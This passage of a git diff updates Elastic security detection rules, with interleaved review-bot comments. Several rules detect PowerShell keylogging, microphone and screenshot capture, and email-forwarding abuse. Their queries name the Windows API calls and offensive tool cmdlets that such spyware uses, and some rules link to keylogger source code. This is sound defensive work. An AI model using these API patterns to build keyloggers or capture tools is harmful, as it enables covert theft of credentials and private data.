+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "a10d3d9d-0f65-48f1-8b25-af175e2594f5",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json
index cd297c5adfd75..2685d574288cd 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json 
@@ -16,16 +16,65 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Inbox Forwarding Rule Created", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:\"New-InboxRule\" and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n ) \n and event.outcome:success\n", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:\"New-InboxRule\" and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": 
"o365.audit.Parameters.ForwardTo",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "o365.audit.Parameters.RedirectTo",
+ "type": "unknown"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -61,5 +110,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json
index 8083c0fb776b1..c4433654a6398 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json
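Review bot: The three `o365.audit.Parameters.*` entries added to `required_fields` are declared with `"ecs": false` and `"type": "unknown"`, even though the same hunk pins the `o365` package at `1.3.0` in `related_integrations`; if that integration version maps these fields, the generated `type` should be resolved to the mapped type so the required-fields check is meaningful, and if it does not map them, that is worth stating in `setup` since the whole query hinges on those parameters being indexed. The `setup` string only restates the data-source sentence that was in `note`; it does not tell an operator that the rule additionally requires Exchange audit parameters to be present. The `query` change in this hunk is whitespace only, so the detection logic is unchanged.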
@@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Script with Audio Capture Capabilities", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Audio Capture Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices\nconnected to the victim's computer.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the recorded data locally and determine if anything was recorded.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users should not need scripts to capture audio, which makes false positives unlikely. 
In the case of\nauthorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n \"Get-MicrophoneAudio\" or 
(waveInGetNumDevs and mciSendStringA)\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Audio Capture Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices\nconnected to the victim's computer.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the recorded data locally and determine if anything was recorded.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users should not need scripts to capture audio, which makes false positives unlikely. 
In the case of\nauthorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n \"Get-MicrophoneAudio\" or (waveInGetNumDevs and mciSendStringA)\n )\n", "references": [ "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to 
implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -67,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json index 29bf64cfbf834..169e9b58da9ed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json 
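Review bot: The `setup` string added here carries over the duplicated word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; change it to `Steps to implement the logging policy with Advanced Audit Configuration:`. The identical text, with the same typo, is added in the PowerShell Keylogging Script and PowerShell Suspicious Script with Screenshot Capabilities hunks below, so all three files should be fixed together. The `required_fields` entry for `powershell.file.script_block_text` is declared `"type": "unknown"` with `"ecs": false`; if the field is produced by the Windows integration named elsewhere in this rule set, declaring its mapped type (and the integration in `related_integrations`) would make the prerequisite check useful rather than a placeholder.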
@@ -11,14 +11,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Keylogging Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell Keylogging Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other\nvaluable information as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making\nfalse positives unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n ( \n powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or \"Get-Keystrokes\") or \n 
powershell.file.script_block_text : (\n (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and\n (GetForegroundWindow or GetWindowTextA or GetWindowTextW or \"WM_KEYBOARD_LL\")\n )\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Keylogging Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other\nvaluable information as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making\nfalse positives unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n (\n powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or \"Get-Keystrokes\") or\n powershell.file.script_block_text : (\n (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and\n (GetForegroundWindow or GetWindowTextA or GetWindowTextW or \"WM_KEYBOARD_LL\")\n )\n )\n", "references": [ "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Keystrokes.ps1", "https://github.com/MojtabaTajik/FunnyKeylogger/blob/master/FunnyLogger.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + 
{
+ "ecs": false,
+ "name": "powershell.file.script_block_text",
+ "type": "unknown"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -75,5 +88,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json
index 98c694a7f9ab4..68ede0b3b56be 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json
@@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Script with Screenshot Capabilities", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Screenshot Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, which makes\nit available for use in various environments and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities and take screen captures of desktops to gather information over the course\nof an operation.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to take screenshots, which makes false\npositives unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n CopyFromScreen and\n (\"System.Drawing.Bitmap\" or \"Drawing.Bitmap\")\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Screenshot Capabilities\n\nPowerShell is one of the main tools system 
administrators use for automation, report routines, and other tasks, which makes\nit available for use in various environments and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities and take screen captures of desktops to gather information over the course\nof an operation.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to take screenshots, which makes false\npositives unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n CopyFromScreen and\n (\"System.Drawing.Bitmap\" or \"Drawing.Bitmap\")\n )\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps 
to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -67,5 +80,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json
index 7e8ab8d94d8f0..bcd3872f72992 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json
@@ -14,13 +14,38 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Event Hub Authorization Rule Created or Updated",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/WRITE\" and event.outcome:(Success or success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/event-hubs/authorize-access-shared-access-signature"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "b6dce542-2b75-4ffb-b7d6-38787298ba9d",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -64,5 +89,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json
index 9b4fb9e87beb4..8a59df74a0755 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json
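Review bot: The `related_integrations` entry added here names the data stream (`"integration": "activitylogs"`), while the GCP and Microsoft 365 entries in the hunks above carry only `package` and `version`; if the schema allows naming the stream, those two should be as specific (`"integration": "audit"` for both), otherwise a short comment in the generator on why the Azure entry differs would stop the inconsistency from looking like an omission. The pinned `"version": "0.12.0"` is a pre-1.0 integration release; it is worth confirming this is the minimum version whose mapping actually provides `azure.activitylogs.operation_name` as `keyword` (as `required_fields` now asserts) rather than simply the version available when the metadata was generated. The `query` line in this hunk is unchanged context.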
@@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Encrypting Files with WinRar or 7z", - "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the\ncollected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is\nbeing exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the\nfile names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. 
Check the `process.parent.executable` and\n`process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the\ncollected data and minimize the amount of data sent over the network. 
